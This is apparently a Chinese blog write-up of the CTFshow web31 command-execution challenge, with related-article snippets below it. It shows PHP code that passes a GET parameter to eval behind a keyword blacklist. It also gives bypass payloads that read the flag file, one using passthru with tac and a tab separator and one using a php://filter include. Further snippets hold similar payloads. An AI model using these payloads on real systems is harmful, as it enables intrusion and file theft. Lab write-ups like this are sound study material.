CTFshow命令执行31

最新推荐文章于 2024-04-22 22:56:37 发布
最新推荐文章于 2024-04-22 22:56:37 发布
阅读量168 收藏
点赞数
分类专栏: CTFshow 命令执行 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a861511690/article/details/117804273
版权 
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

显然对空格单引号都进行了过滤,命令执行有四个函数我们可以使用passthru() 并将’ '替换为" " 将cat替换为tac(还有很多比如more less懒得写了 得出最简单的命令执行c=passthru(“tac%09f*”);
当然也可以采取文件包含的方法
c=include($_GET[“url”]);?>&url=php://filter/read=convert.base64-encode/resource=flag.php

a861511690
关注
专栏目录
ctfshow-web入门-命令执行-web31
HkD01L的博客
06-24 948
ctfshow,命令执行,web31
CTFshow 命令执行 web65
Kradress的博客
12-03 159
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 22:02:47 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ // 你们在炫技吗? if(isset($_POST
ctfshow-web31(命令执行)
m0_62094846的博客
01-21 556
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 00:49:10 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); if(isset($_GET['c'])){..
ctfshow-命令执行-web31
weixin_43400535的博客
10-28 616
ctfshow-web31 题目描述: 原理: 同web29 审计: <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 00:49:10 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_r
CTFshow 命令执行 web29 30 31
ChenD的学习笔记
11-08 1670
CTFshow 命令执行 web29 web30 web31
ctfshow 命令执行
m0_74097148的博客
05-21 4087
dev/null文件可以被看作是一个“黑洞”文件。它等价于一个只写的的文件。所有写入它的内容都会永远丢失(因为不可读)。这里说flag在36.php中,那么我们想办法构造处36即可.这里参考大佬的做法。/dev/null 2>&1主要意思是不进行回显,让命令回显,我们进行命令分隔。如下图第一个元素为点号。
CTFshow web入门之命令执行总结
小白的博客
05-10 523
1、命令执行函数。
CTFshow 命令执行 web57
Kradress的博客
11-20 454
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-08 01:02:56 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ // 还能炫的动吗? //flag in 36.php if
CTFshow 命令执行 web51
Kradress的博客
11-20 365
目录源码知识点题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-05 22:42:52 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){
CTFshow 命令执行 web31
Kradress的博客
10-29 310
查看源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 00:49:10 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); if(isset($_GET['c']
CTFshow 命令执行
xian653617125的博客
05-16 721
web 39 看代码是过滤了输入的限制,不能输flag,我们可以在include里面利用伪协议data://text/plain,后面的语句会被当做php代码来执行,因为我们在前面已经闭合了php的代码所有后面的.php并不影响(但我不太懂.php会被怎么样,请师傅们帮我解解惑) 如图所示 .php直接被显示到了页面上,我们也得到了flag的文件名,然后我们利用system执行命令 最后就可以得到flag了,但是记得因为过滤了flag所以我们用?来代替一个字符。 web40 过滤了 ...
CTFSHOW 命令执行
asmartrman的博客
09-27 2304
ctfshow-web入门-命令执行板块(持续更新)
[CTF]ctfshow命令执行
m0_63416413的博客
03-19 414
在ctfshow做题中随手记录,不尽详细
ctfshow命令执行
SopRomeo的博客
12-14 961
web41 取反和异或,$被过滤 也不能通过位运算 但是 | 运算符没有被过滤 参考文献 def action(arg): s1="" s2="" for i in arg: f=open("异或.txt","r") while True: t=f.readline() if t=="": break if t[0]==i: print
ctfshow web入门 命令执行部分(29-31
羽的博客
09-05 2267
大佬请自行忽略讲解部分,讲解针对新手。知识点源自payload的构造。大部分flag需要右键查看源码获得 29 知识点:通配符 payload:c=system('cat f*'); 在linux系统中 有一些通配符 * 匹配任何字符串/文本,包括空字符串;*代表任意字符(0个或多个) ls file * ? 匹配任何一个字符(不在括号内时)?代表任意1个字符 ls file 0 [abcd] 匹配abcd中任何一个字符 [a-z] 表示范围a到z,表示范围的意思 []匹配中括号中任意一个字符 ls fil
CTFshow—爆破、命令执行
D.MIND 的博客
02-04 1113
Web入门: 爆破: web24伪随机数 通过mt_srand()分发种子(播种),有了种子后随机数也就确定了(随机就那一组了,因此说伪随机) mt_scrand() //播种 Mersenne Twister 随机数生成器。 mt_rand() //生成随机数 详细请参考:php伪随机数 解题脚本: <?php mt_srand(372619038); echo(mt_rand()); ?> web28 要求扫描目录 扫描这两个目录,各从0到100 但扫描时注意 不能加上
CTFShow Web入门 命令执行(持续更新)
最新发布
tj13995958709的博客
04-22 2184
3.array_pop(next(get_defined_vars()))是将数组中最后一个键值对的值弹出,配和POST传入的1=phpinfo();过滤了数字、大小写字母和一些特殊符号,基本大部分的都过滤了,只能对ASCII码中没被过滤的字符进行匹配,需要用到python写一个自动化脚本,以下是摘自往上的python脚本代码。除了system()、反引号``可以执行系统命令,exec()、shell_exec()、passthru()等函数也可以。这题又多过滤的几个特殊符号,通配符*被过滤了,可以用?
Ctfshow web-web31
qq_45427131的博客
05-16 342
首先查看源代码,还是preg_match函数,这次过滤了 flag|system|php|cat|sort|shell|.| |’ 这次过滤了以上函数 多了对单引号的过滤,单引号的过滤是小问题,因为 <?php eval($_POST['a']);?>中单引号是可有可无的 <?php eval($_POST['a']);?> = <?php eval($_POST[a]);?> 而对于system的过滤,则可以用其他php的命令执行函数代替,比如passthru 构造
ctfshow web入门命令执行
09-05
在CTF中,web入门命令执行指的是通过Web应用程序的漏洞,将恶意的命令注入到应用程序中并执行。这样的攻击可以导致未经授权的访问和操纵应用程序的数据和功能。 根据引用中提供的信息,可以看到一些常见的双写绕过技巧,如分号、竖线、双与号等。这些技巧可以用来绕过应用程序对输入参数的限制,从而注入恶意的命令。 引用中提到的payload,其中使用了一个通用的命令执行函数"show_source"来显示指定文件的源代码。这个payload可以用来尝试执行"flag.php"文件的源代码。但前提是要知道有一个名为"flag.php"的文件存在。 另外,引用中提供了另一种payload的示例,其中使用了array_reverse和scandir函数来获取文件目录并显示指定文件的源代码。同样,也可以直接使用show_source('flag.php')来显示"flag.php"文件的源代码。 需要注意的是,命令执行漏洞是非常危险的,因为它可以导致恶意用户执行任意的系统命令。为了保护Web应用程序免受此类攻击,开发人员应该对用户的输入进行严格的验证和过滤,并使用安全的编程实践来防止命令注入漏洞的发生。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [ctfshow web入门之命令执行](https://blog.csdn.net/uuzfumo/article/details/128357863)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [CTFShow Web入门 命令执行](https://blog.csdn.net/qq_19533763/article/details/123910732)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值